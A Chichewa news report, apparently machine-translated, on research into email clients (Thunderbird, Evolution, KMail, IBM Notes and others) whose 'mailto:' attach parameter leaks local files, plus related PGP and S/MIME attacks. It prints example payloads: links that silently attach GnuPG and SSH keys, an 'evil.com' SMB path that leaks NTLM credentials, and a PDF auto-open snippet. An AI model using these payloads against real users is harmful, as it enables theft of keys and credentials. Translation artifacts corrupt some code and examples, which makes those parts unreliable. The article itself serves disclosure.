Ofufuza ochokera ku Ruhr University Bochum (Germany) () khalidwe lamakasitomala akamakonza maulalo a "mailto:" okhala ndi magawo apamwamba. asanu mwa makasitomala makumi awiri a imelo omwe adawunikidwa anali pachiwopsezo cha chiwopsezo chomwe chinasokoneza kusintha kwazinthu pogwiritsa ntchito "attach" parameter. Makasitomala ena asanu ndi limodzi owonjezera anali pachiwopsezo cha kusintha kwa makiyi a PGP ndi S/MIME, ndipo makasitomala atatu anali pachiwopsezo chowukiridwa kuti achotse zomwe zili mu mauthenga obisika.
Maulalo Β«"amagwiritsidwa ntchito kutsegulira kwa kasitomala wa imelo kuti alembe kalata kwa omwe atchulidwa mu ulalo. Kuphatikiza pa adilesi, mutha kutchulanso magawo ena monga gawo la ulalo, monga mutu wa kalatayo ndi template ya zomwe zili. Kuwukiraku kumagwiritsa ntchito "attach" parameter, yomwe imakulolani kuti mugwirizane ndi uthenga womwe wapangidwa.
Makasitomala amakalata a Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) ndi Pegasus Mail anali pachiwopsezo chachiwopsezo chaching'ono chomwe chimakulolani kuti mungolumikiza zokha. Fayilo iliyonse yapafupi, yotchulidwa kudzera pa ulalo ngati "mailto:?attach=path_to_file". Fayiloyo imamangirizidwa popanda kuwonetsa chenjezo, kotero popanda chidwi chapadera, wogwiritsa ntchitoyo sangazindikire kuti kalatayo idzatumizidwa ndi chomata.
Mwachitsanzo, kugwiritsa ntchito ulalo ngati "mailto:[imelo ndiotetezedwa]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" mutha kuyika makiyi achinsinsi kuchokera ku GnuPG mu chilembocho. Mutha kutumizanso zomwe zili m'matumba a crypto (~/.bitcoin/wallet.dat), makiyi a SSH (~/.ssh/id_rsa) ndi mafayilo aliwonse omwe wogwiritsa ntchito angawapeze. Komanso, Thunderbird imakulolani kuti muphatikize magulu a mafayilo ndi chigoba pogwiritsa ntchito zomangamanga monga "attach=/tmp/*.txt".
Kuphatikiza pa mafayilo am'deralo, makasitomala ena a imelo amakonza maulalo osungira ma netiweki ndi njira mu seva ya IMAP. Makamaka, IBM Notes imakupatsani mwayi wosinthira fayilo kuchokera pamanetiweki mukakonza maulalo ngati "attach=\\evil.com\dummyfile", komanso kuletsa magawo otsimikizika a NTLM potumiza ulalo ku seva ya SMB yoyendetsedwa ndi wowukira. (chopemphacho chidzatumizidwa ndi wogwiritsa ntchito zovomerezeka zamakono).
Thunderbird imayendetsa bwino zopempha monga "attach=imap:///fetch>UID>/INBOX>1/", zomwe zimakupatsani mwayi wolumikiza zomwe zili muzikwatu pa seva ya IMAP. Nthawi yomweyo, mauthenga otengedwa kuchokera ku IMAP, osungidwa kudzera pa OpenPGP ndi S/MIME, amasinthidwa ndi kasitomala wamakalata asanatumize. Opanga Thunderbird anali za vuto mu February ndi m'magazini vuto lakonzedwa kale (Nthambi za Thunderbird 52, 60 ndi 68 zimakhalabe zosatetezeka).
Mitundu yakale ya Thunderbird inalinso pachiwopsezo chamitundu ina iwiri yowukira pa PGP ndi S/MIME yoperekedwa ndi ofufuza. Makamaka, Thunderbird, komanso OutLook, PostBox, eM Client, MailMate ndi R2Mail2, anali ndi vuto lalikulu lolowa m'malo, chifukwa chakuti kasitomala amatumiza ndikuyika ziphaso zatsopano zomwe zimatumizidwa mu mauthenga a S/MIME, zomwe zimalola. wowukirayo kuti akonze zolowa m'malo mwa makiyi a anthu omwe asungidwa kale ndi wogwiritsa ntchito.
Kuwukira kwachiwiri, komwe Thunderbird, PostBox ndi MailMate amatha kutengeka, kumagwiritsa ntchito mawonekedwe a makina osungira mauthenga ndikulola, pogwiritsa ntchito magawo a mailto, kuyambitsa kutulutsa kwa mauthenga obisika kapena kuwonjezera siginecha ya digito pa mauthenga osagwirizana, ndi kutumiza zotsatira ku seva ya IMAP ya wowukirayo. Pachiwopsezo ichi, ciphertext imafalitsidwa kudzera pa "thupi" parameter, ndipo chizindikiro cha "meta refresh" chimagwiritsidwa ntchito kuyambitsa kuyimba kwa seva ya IMAP ya wowukirayo. Mwachitsanzo: ' '
Kuti muthane ndi maulalo a "mailto:" osagwiritsa ntchito ogwiritsa ntchito, zikalata za PDF zopangidwa mwapadera zitha kugwiritsidwa ntchito - OpenAction action mu PDF imakupatsani mwayi wotsegulira mailto mukatsegula chikalata:
%PDF-1.5
1 0obb
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0obb
<< /Type /Action /S /URI/URI (mailto:?body=ββYAMBANI PGP MESSAGEββ[β¦])>>
endobj
Source: opennet.ru